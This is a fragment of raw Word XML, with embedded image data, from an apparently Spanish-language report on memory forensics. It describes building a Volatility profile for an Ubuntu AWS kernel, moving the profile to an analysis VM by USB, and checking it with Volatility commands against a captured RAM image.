EY0oiIiIgUiCGNiIiISIEY0oiIiIgUiCGNiIiISIEY0oiIiIgUiCGNiIiISIEY0oiIiIgUiCGN&#10;iIiISIEY0oiIiIgUiCGNiIiISIEY0oiIiIgUiCGNiIiISIEY0oiIiIgUiCGNiIiISIFeWkhTqVSa&#10;e0RERESkizVpRERERAr0wkIaa86IiIiIjMeaNCIiIiIFem4hjTVnRERERM+u2EOadjjLL6jpTmeg&#10;IyIiIsqLzZ1ERERECsSQRkRERKRAxRrS9DVbGtO0yeZOIiIiorxeWE2adhCT74tbBjQiIiKipxVL&#10;SHuWoMVwRkRERJS/Ioe0/MKWdi2Z9q328rrjRERERJSr0CGtsKEqv+UZzoiIiIjy90L6pMk1ZnIw&#10;074Vg4mJCbKzs6VpRERERPScQpocwvSRg5n2YG5ujrS0NM0SRERERFSsIU0ELpn2fUE7lMnj8q2Z&#10;mRkePnwojRMRERHRc27u1A5lgnYw0x5KlSqFq1evSvOIiIiI6DmENDl4adOeJt/XHiwtLXHs2DFp&#10;PhERERG9oJq0/AZxwoC4LVGiBK5du4b4+HjNmkRERESvtmIJaXLo0qY7LsjLaQ9yUCtfvjw2b96s&#10;WZKIiIjo1fZcmjtl2mFMnq49Lgc0cWthYYHr16/j0KFD0nJEREREr7Ln1twphzJBO5jJg3ZAkwe5&#10;Ni0yMlKzJhEREdGr6bmENBG+ZLr3tQOa9n1xKy7FUbFiRXz//fcIDg7WrEVERET06nmmkCZClT66&#10;0+Uglt+gHdDkQVzYtnLlyggMDMS3337LkwmIiIjolfPXX39BFRAQkKMZL5ScnKdXE9Pk6fLPPIlb&#10;MU3c6huysrKkQfu+PJ6amoqkpCRUr14dLVu2hKOjI0qXLo2SJUtKgY6IiIjon05kHvHLSw8ePJCu&#10;G3v06FGpn/5zC2nyfXmQQ5m+QQ5l8n15XL5NT0/Ho0eP8PjxY2RmZkqDmKf7ODLt+0UhfgWhbNmy&#10;mjEiIiKiZyNaDmXarYqCqamp1OVLtCa+9tpr0vVjxeXJij2kad+KgCXfimni1phBN7SJW+31xX15&#10;XH4seZpM+76gO26M5ORkVKhQQTNGREREZJh2IBP0BTTt+7rdv55MK86QJmiHJfm+POiGrYIG7aAm&#10;Bt31BflW3r58X/tWpjtuDIY0on8X0YVC1MzL7ytERM+DHMJk2uPyfXErD0KecCbfPmtIE/QFH92Q&#10;pB2oxDT5Vr5vaNBeTns9+b48yOT72tOe1b1792Btba0ZI6J/KvGeIfp6iDc9cU1G0bQgvzESET1v&#10;8vuN9vuOuK89yOFMvv9cQpqgHZzk+9qDdviSb+VBe1zffXEr39fevnxf+7aoREgTlwQhon8u8X4g&#10;asVFXw9x0hER0csgwpfurXxfN6A9uS1KSBP0BSJ9oUl30A1e4lY3hOkuo3tfEOMy7enFITExEZUq&#10;VdKMEdE/UUpKCjIyMqSOuEREL5N2MBNEEBN0A1rufRP8P+14n+FxIKYHAAAAAElFTkSuQmCCUEsD&#10;BBQABgAIAAAAIQDM/S6T4AAAAAgBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI9BS8NAFITvgv9heYI3&#10;u0ljWo3ZlFLUUynYCuLtNfuahGbfhuw2Sf+960mPwwwz3+SrybRioN41lhXEswgEcWl1w5WCz8Pb&#10;wxMI55E1tpZJwZUcrIrbmxwzbUf+oGHvKxFK2GWooPa+y6R0ZU0G3cx2xME72d6gD7KvpO5xDOWm&#10;lfMoWkiDDYeFGjva1FSe9xej4H3EcZ3Er8P2fNpcvw/p7msbk1L3d9P6BYSnyf+F4Rc/oEMRmI72&#10;wtqJVkE44hUk6TIBEezneL4EcVSweEwjkEUu/x8ofg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rfXZIZAQAADMMAAAOAAAAAAAAAAAAAAAAADoC&#10;AABkcnMvZTJvRG9jLnhtbFBLAQItAAoAAAAAAAAAIQC3HiKHxe0AAMXtAAAUAAAAAAAAAAAAAAAA&#10;AMoGAABkcnMvbWVkaWEvaW1hZ2UxLnBuZ1BLAQItAAoAAAAAAAAAIQBmpnjizswAAM7MAAAUAAAA&#10;AAAAAAAAAAAAAMH0AABkcnMvbWVkaWEvaW1hZ2UyLnBuZ1BLAQItABQABgAIAAAAIQDM/S6T4AAA&#10;AAgBAAAPAAAAAAAAAAAAAAAAAMHBAQBkcnMvZG93bnJldi54bWxQSwECLQAUAAYACAAAACEALmzw&#10;AMUAAAClAQAAGQAAAAAAAAAAAAAAAADOwgEAZHJzL19yZWxzL2Uyb0RvYy54bWwucmVsc1BLBQYA&#10;AAAABwAHAL4BAADKwwEAAAA=&#10;">
                <v:group id="_x0000_s1089" style="position:absolute;width:56680;height:18268" coordsize="56680,18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E6ygAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvQv/D8gredJPGiERXEWmlBxHUQvH2yD6TYPZtyG6T+O+7hYLHYWa+YVabwdSio9ZVlhXE0wgE&#10;cW51xYWCr8vHZAHCeWSNtWVS8CAHm/XLaIWZtj2fqDv7QgQIuwwVlN43mZQuL8mgm9qGOHg32xr0&#10;QbaF1C32AW5q+RZFc2mw4rBQYkO7kvL7+cco2PfYb5P4vTvcb7vH9ZIevw8xKTV+HbZLEJ4G/wz/&#10;tz+1glmazBZJkqbwdyncAbn+BQAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAA&#10;AAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAA&#10;FQEAAAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAK8T4TrKAAAA&#10;4gAAAA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD+AgAA&#10;AAA=&#10;">
                  <v:shape id="Imagen 20" o:spid="_x0000_s1090" type="#_x0000_t75" alt="Una captura de pantalla de una computadora&#10;&#10;Descripción generada automáticamente" style="position:absolute;left:22257;width:34423;height:13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QQuygAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9PSwMx&#10;FMTvgt8hPMGbzba1i65NSxGEFvTQPxdvj80zuzZ5WTbPdvXTG0HocZiZ3zDz5RC8OlGf2sgGxqMC&#10;FHEdbcvOwGH/cvcAKgmyRR+ZDHxTguXi+mqOlY1n3tJpJ05lCKcKDTQiXaV1qhsKmEaxI87eR+wD&#10;Spa907bHc4YHrydFUeqALeeFBjt6bqg+7r6CgaPz6/e3jZSf++mPm76GmZDfGHN7M6yeQAkNcgn/&#10;t9fWwON9maHjYgZ/l/Id0ItfAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAA&#10;AAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAA&#10;FQEAAAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAFcxBC7KAAAA&#10;4gAAAA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD+AgAA&#10;AAA=&#10;">
                    <v:imagedata r:id="rId143" o:title="Una captura de pantalla de una computadora&#10;&#10;Descripción generada automáticamente"/>
                  </v:shape>
                  <v:shape id="Imagen 15" o:spid="_x0000_s1091" type="#_x0000_t75" alt="Interfaz de usuario gráfica, Texto, Aplicación, Correo electrónico&#10;&#10;Descripción generada automáticamente" style="position:absolute;top:50;width:21494;height:18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FpxgAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9fa8Iw&#10;EH8f7DuEE/Y2UyuKdEaRwUDHXqKC+HY0Z1LWXEqT1e7bL4PBHu/3/9bb0bdioD42gRXMpgUI4jqY&#10;hq2C8+nteQUiJmSDbWBS8E0RtpvHhzVWJtxZ03BMVuQQjhUqcCl1lZSxduQxTkNHnLlb6D2mfPZW&#10;mh7vOdy3siyKpfTYcG5w2NGro/rz+OUVHLS+3Ob2/ZoGyx+ua/V1obVST5Nx9wIi0Zj+xX/uvcnz&#10;i2VZLlbzWQm/P2UA5OYHAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAvQURacYAAADjAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;">
                    <v:imagedata r:id="rId144" o:title="Interfaz de usuario gráfica, Texto, Aplicación, Correo electrónico&#10;&#10;Descripción generada automáticamente"/>
                  </v:shape>
                </v:group>
                <v:shape id="_x0000_s1092" type="#_x0000_t202" style="position:absolute;left:23636;top:14061;width:3432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wbDzAAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/BTgIx&#10;EL2b8A/NkHgx0sUlCCuFEKKJciGuXLxNtsN2ZTvdtF1Y/96amHh6mXnz3pu32gy2FRfyoXGsYDrJ&#10;QBBXTjdcKzh+vNwvQISIrLF1TAq+KcBmPbpZYaHdld/pUsZaJBMOBSowMXaFlKEyZDFMXEecuJPz&#10;FmMafS21x2syt618yLK5tNhwSjDY0c5QdS57q+Aw+zyYu/70vN/Ocv927Hfzr7pU6nY8bJ9ARBri&#10;//Gf+lWn95f58jFfJIDfTmkBcv0DAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMA&#10;AAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78A&#10;AAAVAQAACwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAsR8Gw8wA&#10;AADjAAAADwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAAAD&#10;AAAAAA==&#10;" stroked="f">
                  <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="6ADE00B0" w14:textId="6306BFD1" w:rsidR="00CA2DBC" w:rsidRPr="00AF10E2" w:rsidRDefault="00CA2DBC" w:rsidP="00CA2DBC">
                        <w:pPr>
                          <w:pStyle w:val="Descripcin"/>
                          <w:rPr>
                            <w:rFonts w:cs="Arial"/>
                            <w:noProof/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">Ilustración </w:t>
                        </w:r>
                        <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                          <w:r w:rsidR="00117A4E">
                            <w:rPr>
                              <w:noProof/>
                            </w:rPr>
                            <w:t>22</w:t>
                          </w:r>
                        </w:fldSimple>
                        <w:r>
                          <w:t xml:space="preserve">: </w:t>
                        </w:r>
                        <w:bookmarkStart w:id="62" w:name="_Toc155782589"/>
                        <w:r w:rsidRPr="00225B1B">
                          <w:t>Propiedades del perfil y comprobación.</w:t>
                        </w:r>
                        <w:bookmarkEnd w:id="62"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="square" anchorx="margin"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="009B1250" w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Una vez creado el perfil, tenemos que sacar el perfil del servidor para después pegarlo dentro de la máquina una donde realizaremos el análisis. para ello procederemos a montar un </w:t>
      </w:r>
      <w:r w:rsidR="0098259F" w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>USB</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>USB (Universal Serial Bus): Estándar de industria para cables, conectores y protocolos de comunicación para la conexión, comunicación y suministro de energía entre computadoras y dispositivos electrónicos.</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9B1250" w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> dentro del servidor del </w:t>
      </w:r>
      <w:r w:rsidR="0098259F" w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Ubuntu: Una distribución de Linux basada en Debian, popular por su facilidad de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9B1250" w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, posteriormente copiamos el archivo, </w:t>
      </w:r>
      <w:r w:rsidR="009B1250" w:rsidRPr="00E23DB4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/home/jrodg85/volatility</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="000B7784">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Volatility: Herramienta de análisis de memoria forense.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="009B1250" w:rsidRPr="00E23DB4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/volatility/plugins/overlays/linuxUbuntu_4.15.0-1021-aws_profile.zip</w:t>
      </w:r>
      <w:r w:rsidR="009B1250" w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, y lo pegamos en el </w:t>
      </w:r>
      <w:r w:rsidR="009B1250" w:rsidRPr="00E23DB4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>USB</w:t>
      </w:r>
      <w:r w:rsidR="009B1250" w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. En nuestro caso, hemos el </w:t>
      </w:r>
      <w:r w:rsidR="009B1250" w:rsidRPr="00E23DB4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>USB</w:t>
      </w:r>
      <w:r w:rsidR="009B1250" w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> lo hemos montado en </w:t>
      </w:r>
      <w:r w:rsidR="009B1250" w:rsidRPr="00E23DB4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/home/jrodg85/usb/</w:t>
      </w:r>
      <w:r w:rsidR="00E23DB4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="009B1250" w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Posteriormente, procedemos a insertar en la VM de Ubuntu con Volatility en la carpeta en la carpeta </w:t>
      </w:r>
      <w:r w:rsidR="009B1250" w:rsidRPr="0098259F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/home/jrodg85/volatility/volatility/plugins/overlays/linux</w:t>
      </w:r>
      <w:r w:rsidR="00894A5D">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D7C6C5" w14:textId="51F32581" w:rsidR="006E46DC" w:rsidRPr="009B1250" w:rsidRDefault="006E46DC" w:rsidP="006E46DC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ara comprobar que esta correctamente creado el perfil procedemos a ejecutar el comando </w:t>
      </w:r>
      <w:r w:rsidRPr="006E46DC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>sudo python2.7 vol.py --info</w:t>
      </w:r>
      <w:r w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, donde se podrá observar que se ha creado correctamente el perfil.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41726DB4" w14:textId="3D52F65D" w:rsidR="009B1250" w:rsidRDefault="009B1250" w:rsidP="009B1250">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Para probar el correcto funcionamiento del perfil, procederemos a hacer la captura de la </w:t>
      </w:r>
      <w:r w:rsidR="0098259F" w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>CPU (Central Processing Unit): Unidad de procesamiento central de una computadora, el componente principal que realiza la mayoría de las operaciones de procesamiento.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9B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> con el comando </w:t>
      </w:r>
      <w:r w:rsidRPr="006E46DC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>sudo python2.7 vol.py --</w:t>
      </w:r>
      <w:r w:rsidRPr="006E46DC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>profile=LinuxlinuxUbuntu_4_15_0-1021-aws_profilex64 -f '/home/jrodg85/Server_RAM</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>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ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="006E46DC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>.mem' linux_cpuinfo</w:t>
      </w:r>
      <w:r w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Esta información la usaremos </w:t>
      </w:r>
      <w:r w:rsidR="00BD1378">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251745280" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="109C6999" wp14:editId="4AFB5226">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>left</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>506095</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5401945" cy="1034415"/>
                <wp:effectExtent l="0" t="0" r="8255" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="292435084" name="Grupo 12"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5401945" cy="1034415"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5402027" cy="1034415"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="1485913840" name="Imagen 23" descr="Texto&#10;&#10;Descripción generada automáticamente"/>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717290" cy="1034415"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="532791796" name="Cuadro de texto 1"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3855802" y="198408"/>
                            <a:ext cx="1546225" cy="678180"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:prstClr val="white"/>
                          </a:solidFill>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="78B8D5A8" w14:textId="48684A55" w:rsidR="00300365" w:rsidRPr="00233117" w:rsidRDefault="00300365" w:rsidP="00300365">
                              <w:pPr>
                                <w:pStyle w:val="Descripcin"/>
                                <w:rPr>
                                  <w:noProof/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve">Ilustración </w:t>
                              </w:r>
                              <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                                <w:r w:rsidR="00117A4E">
                                  <w:rPr>
                                    <w:noProof/>
                                  </w:rPr>
                                  <w:t>23</w:t>
                                </w:r>
                              </w:fldSimple>
                              <w:r>
                                <w:t xml:space="preserve">: </w:t>
                              </w:r>
                              <w:bookmarkStart w:id="63" w:name="_Toc155782590"/>
                              <w:r w:rsidRPr="00AB1D87">
                                <w:t>Comprobación de funcionamiento del nuevo perfil.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9C6999" id="Grupo 12" o:spid="_x0000_s1093" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:39.85pt;width:425.35pt;height:81.45pt;z-index:251745280;mso-position-horizontal:left;mso-position-horizontal-relative:margin" coordsize="54020,10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5mFEmAMAACQIAAAOAAAAZHJzL2Uyb0RvYy54bWycVdtu4zYQfS/QfyBY&#10;oG8bWbIdXxpn4TpNECDYNZoU+0xTlEWsRLIkbSv7N/2GfsL+WA8pybl4i27zYHl4mzk8c2Z48b6p&#10;K7IX1kmtFjQ9G1AiFNe5VNsF/ePh+t2UEueZylmllVjQR+Ho+8sff7g4mLnIdKmrXFgCJ8rND2ZB&#10;S+/NPEkcL0XN3Jk2QmGx0LZmHkO7TXLLDvBeV0k2GJwnB21zYzUXzmH2ql2kl9F/UQjuPxaFE55U&#10;CwpsPn5t/G7CN7m8YPOtZaaUvIPB3oCiZlIh6NHVFfOM7Kw8cVVLbrXThT/juk50UUgu4h1wm3Tw&#10;6jY3Vu9MvMt2ftiaI02g9hVPb3bLP+xvrLk3awsmDmYLLuIo3KUpbB3+gZI0kbLHI2Wi8YRjcjwa&#10;pLPRmBKOtXQwHI3ScUsqL8H8yTle/vZ0Mhtkk5OTSR84eQHHSD7Hr+MA1gkH/60VnPI7K2jnpP4u&#10;HzWzn3fmHdJlmJcbWUn/GKWHxARQar+WfG3bAehcWyJzcDGajmfpcDqC6hSrIf3bmm2FItmQklw4&#10;DhE+gEX980/N8pf4uQqz0nD59W9FsFVYljPCdl7XX//yksOL8iKwG+KGUG1gFoi50/yzI0qvSqa2&#10;YukMpA8UYXfycnscvkC9qaS5llUVkh3sjh8gfCWzb1DcSvhK811A19akFRWo0sqV0jhK7FzUGwFO&#10;7G0eAbG581Z4XoaABQL/DrAB6LOFiPIJWLiCg0q/V5fDSTrJZuD+lS6P6gJp1